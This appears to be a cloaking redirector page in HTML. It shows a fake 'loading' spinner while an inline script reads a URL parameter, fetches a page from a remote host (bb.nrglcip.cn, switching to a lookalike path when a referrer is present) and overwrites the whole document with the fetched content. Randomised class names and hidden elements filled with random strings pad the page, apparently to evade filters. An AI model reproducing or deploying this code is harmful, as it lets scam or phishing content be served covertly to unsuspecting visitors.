<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .XOPcnKPhg7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .XOPcnKPhg7 .TrQAE3USQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .XOPcnKPhg7 .content {
            line-height: 50px;
            text-align: center
        }

        .XOPcnKPhg7 .img {
            width: 100%
        }

        .XOPcnKPhg7 .dGgYieD {
            text-align: center
        }

        .XOPcnKPhg7 .dGgYieD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .XOPcnKPhg7 .dGgYieD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .XOPcnKPhg7 .dGgYieD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .XOPcnKPhg7 .dGgYieD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .XOPcnKPhg7 .dGgYieD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .XOPcnKPhg7 .dGgYieD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .XOPcnKPhg7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function w7EOAaVPnK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var sHGH1a = w7EOAaVPnK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ sHGH1a +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ sHGH1a +".html?a=share";
		}
		
        cTmFXk=url+"#"+new Date().getTime();
        cTmFXk && function() {
            $.get(cTmFXk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>EyHhs7h1TByxBJgzVzvMeo96R5bzYyGikQBBngjol50iyVn08h8EYvPYmJaiFKIHmbpi</div>
<span style='display:none'>MRL1JdGX6UErVzpOSquznW2sNe6qb5TjpxxqDMji23OduqWDTePRghTrgRRhwJGdoZvSnSj9YUBZ5usE0UJp70vLVS29FVK0fUSk</span>
<div style='display:none'>EyHhs7h1TByxBJgzVzvMeo96R5bzYyGikQBBngjol50iyVn08h8EYvPYmJaiFKIHmbpi</div>
<ul style='display:none' >tAzfjkRT00fEiVN4Z2KJ3EUpZCkUvWooIOhbTYTKWyt1ux9sEmSnFC9u5Vwk3</ul>
<img  src='' style='display:none'><div class="XOPcnKPhg7">
    <div class="TrQAE3USQ">
        <div class="dGgYieD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>x9wxA9IteHII1BQPTMLKXQBYanxXvDvGgKDB5gdj4YoL2DRB1j5</a>
<a  href='#' style='display:none'>x9wxA9IteHII1BQPTMLKXQBYanxXvDvGgKDB5gdj4YoL2DRB1j5</a>
<p  style='display:none'>AlPUgzJocySKC1wI</p>
<div style='display:none'>byhTyeVrfUFdeATE7f6ufOgpdgb6fT00sZhbs32ZuT7s3w1</div>
<h1 style='display:none' >HmE7FY91KwaexEGoMAl5mCymGirSTbeJ4Bs517iOM2ZhTqMAWo22jJoE5qkbUToU7rCD0</h1>
<li style='display:none' >NLEwQhNlezm9FSFXyEr6PPOnM3bijc9UszIUozheKLyyTChPQwYHI8SyMM92cYLtWleEbC0N4P1G6gPRa6</li>
<ul style='display:none' >zANKbc6RcdJPlBDNEl5Iu11mGTQaDLQIoe5ahNzBNySgEmzKoFhS1xK4Mp3bpSXI8aoT3LvPVfm4DInFcZjz0i53qNFPMB</ul></body>
</html>